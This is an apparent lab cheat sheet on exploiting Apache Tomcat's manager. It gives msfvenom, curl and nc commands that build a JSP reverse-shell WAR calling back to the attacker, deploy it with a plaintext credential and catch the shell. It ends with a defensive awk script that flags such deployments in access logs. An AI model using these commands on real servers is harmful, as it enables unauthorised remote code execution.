# Tomcat

Tomcat is usually a secondary service and typically runs on port 8080.

### Interesting Endpoints

```bash
/manager/html
/host-manager/html
```

### Important Files

```bash
tomcat-users.xml # contains usernames and passwords
```

## Exploitation

* Create a malicious `.war` file, deploy it, and obtain a reverse shell

```bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=tun0 LPORT=1234 -f war > shell.war
```

![source : hackingarticles](https://2587790434-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FsIDfsFf4ZaEESeP0YPTJ%2Fuploads%2F9OERDL39vXZzyyo2xW3G%2Ftomcat.png?alt=media\&token=d91c588a-02c9-47e8-a578-aa9a9559bf4c)

* Once deployed, make a request to `http://targeturi:8080/shell` to obtain the reverse shell

### NO-GUI

* When there is no GUI, the malicious WAR file can still be uploaded and deployed, which leads to a reverse shell

```bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=tun0 LPORT=1234 -f war > shell.war

# curl --upload-file shell.war 'http://<username>:<password>@<host>:8080/manager/text/deploy?path=/<deploy path>'
curl --upload-file shell.war 'http://tomcat:$3cureP4s5w0rd123!@10.129.113.205:8080/manager/text/deploy?path=/dnoscp'

# listen for a reverse shell
nc -lvnp 1234

# make a request and obtain reverse shell
# curl -L --head http://<host>:8080/deployPath
curl -L --head http://10.129.113.205:8080/dnoscp
```
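Seen from the server side, the `curl --upload-file` deployment above is an authenticated `PUT` to `/manager/text/deploy`, and it shows up in Tomcat's access log. The script below is an added example, not part of the original notes: it assumes the default access-log pattern `%h %l %u %t "%r" %s %b`, and the function names and sample log lines are constructed for illustration.

```bash
#!/usr/bin/env bash
# Added example: spot WAR deployments made through the Tomcat text manager.
# Assumes the default access-log pattern: %h %l %u %t "%r" %s %b

# Constructed sample log lines (documentation addresses, not a real host).
sample_log() {
cat <<'EOF'
192.0.2.10 - - [12/Mar/2024:10:01:02 +0000] "GET /manager/html HTTP/1.1" 401 2499
192.0.2.10 - tomcat [12/Mar/2024:10:01:09 +0000] "GET /manager/html HTTP/1.1" 200 18342
198.51.100.7 - - [12/Mar/2024:10:04:40 +0000] "PUT /manager/text/deploy?path=/app1 HTTP/1.1" 401 2499
198.51.100.7 - tomcat [12/Mar/2024:10:04:55 +0000] "PUT /manager/text/deploy?path=/app1 HTTP/1.1" 200 58
198.51.100.7 - - [12/Mar/2024:10:05:03 +0000] "HEAD /app1 HTTP/1.1" 302 -
203.0.113.5 - admin [12/Mar/2024:11:00:00 +0000] "GET /manager/text/list HTTP/1.1" 200 210
EOF
}

# find_deploys: read access-log lines on stdin and print, for every PUT to
# /manager/text/deploy: <client> <user> <status> <context path>
find_deploys() {
  awk '
    $6 == "\"PUT" && $7 ~ /^\/manager\/text\/deploy([?]|$)/ {
      path = "-"
      n = split($7, q, "[?&]")          # q[1] is the URI, the rest are parameters
      for (i = 2; i <= n; i++)
        if (q[i] ~ /^path=/) path = substr(q[i], 6)
      print $1, $3, $9, path
    }'
}

# accepted_deploys: deploy requests that passed authentication and were
# processed by the manager (HTTP 200).
accepted_deploys() {
  find_deploys | awk '$3 == 200'
}

# failed_manager_auth: number of 401 responses under /manager/ per client,
# which indicates password guessing against the manager application.
failed_manager_auth() {
  awk '$7 ~ /^\/manager\// && $9 == 401 { c[$1]++ }
       END { for (h in c) print h, c[h] }' | sort
}

sample_log | accepted_deploys
```

On a real server, feed the functions the `localhost_access_log.*.txt` files from Tomcat's `logs/` directory instead of `sample_log`, and compare the reported context paths against the applications you expect to be deployed.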
